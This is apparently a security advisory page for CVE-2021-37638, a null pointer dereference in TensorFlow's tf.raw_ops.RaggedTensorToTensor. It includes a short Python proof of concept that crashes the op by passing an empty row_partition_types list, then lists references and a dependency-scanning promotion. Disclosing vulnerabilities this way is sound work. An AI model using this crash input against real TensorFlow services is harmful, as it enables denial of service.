CVE-2021-37638: Null pointer dereference in `RaggedTensorToTensor`
(updated )
Sending invalid argument for row_partition_types of tf.raw_ops.RaggedTensorToTensor API results in a null pointer dereference and undefined behavior:
import tensorflow as tf
tf.raw_ops.RaggedTensorToTensor(
shape=1,
values=10,
default_value=21,
row_partition_tensors=tf.constant([0,0,0,0]),
row_partition_types=[])
References
- github.com/advisories/GHSA-hwr7-8gxx-fj5p
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-551.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-749.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-260.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/301ae88b331d37a2a16159b65b255f4f9eb39314
- github.com/tensorflow/tensorflow/security/advisories/GHSA-hwr7-8gxx-fj5p
- nvd.nist.gov/vuln/detail/CVE-2021-37638
Code Behaviors & Features
Detect and mitigate CVE-2021-37638 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →